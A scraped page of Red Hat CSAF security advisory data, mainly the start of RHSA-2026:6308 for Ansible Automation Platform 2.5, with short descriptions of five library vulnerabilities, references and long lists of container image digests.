"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pyasn1: pyasn1 Vulnerable to Denial of Service via Unbounded Recursion"
}
]
}
RHSA-2026:6308
Vulnerability from csaf_redhat - Published: 2026-03-31 22:34 - Updated: 2026-04-16 10:29A decompression based denial of service flaw has been discovered in the AIOHTTP python library. Library versions 3.13.2 and below allow a zip bomb to be used to execute a DoS against the AIOHTTP server. An attacker may be able to send a compressed request that when decompressed by AIOHTTP could exhaust the host's memory.
A flaw was found in the jsonpath component. This vulnerability allows a remote attacker to achieve arbitrary code execution by supplying a malicious JSON Path expression. The component's reliance on the `static-eval` module for processing user-supplied input leads to unsafe evaluation. Successful exploitation can result in Remote Code Execution (RCE) in Node.js environments or Cross-site Scripting (XSS) in browser contexts.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.
A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor > 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Ansible Automation Platform 2.5",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.\n\nFor details about this release, refer to the release notes listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:6308",
"url": "https://access.redhat.com/errata/RHSA-2026:6308"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-69223",
"url": "https://access.redhat.com/security/cve/CVE-2025-69223"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-1615",
"url": "https://access.redhat.com/security/cve/CVE-2026-1615"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25990",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26007",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.5/html/release_notes/patch_releases",
"url": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.5/html/release_notes/patch_releases"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6308.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.5 Container Release Update",
"tracking": {
"current_release_date": "2026-04-16T10:29:41+00:00",
"generator": {
"date": "2026-04-16T10:29:41+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:6308",
"initial_release_date": "2026-03-31T22:34:16+00:00",
"revision_history": [
{
"date": "2026-03-31T22:34:16+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-31T22:34:31+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T10:29:41+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.5",
"product": {
"name": "Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.5::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Ansible Automation Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-operator-bundle@sha256%3Abc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform\u0026tag=1774617799"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel8@sha256%3A0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774398911"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-operator-bundle@sha256%3A8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform\u0026tag=1774617957"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel8@sha256%3Ac264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774401522"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel8@sha256%3A3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774573155"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel8@sha256%3A3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774414699"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel8@sha256%3A360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774446874"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel8-operator@sha256%3A433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167211"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-python-base-rhel8@sha256%3A8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774398095"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-python-toolkit-rhel8@sha256%3Ac25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774401376"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel8@sha256%3A783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774401023"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel8-operator@sha256%3A6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel8@sha256%3A9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774399338"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel8-operator@sha256%3A3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel8@sha256%3A3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774484106"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel8@sha256%3A9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774352226"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"product": {
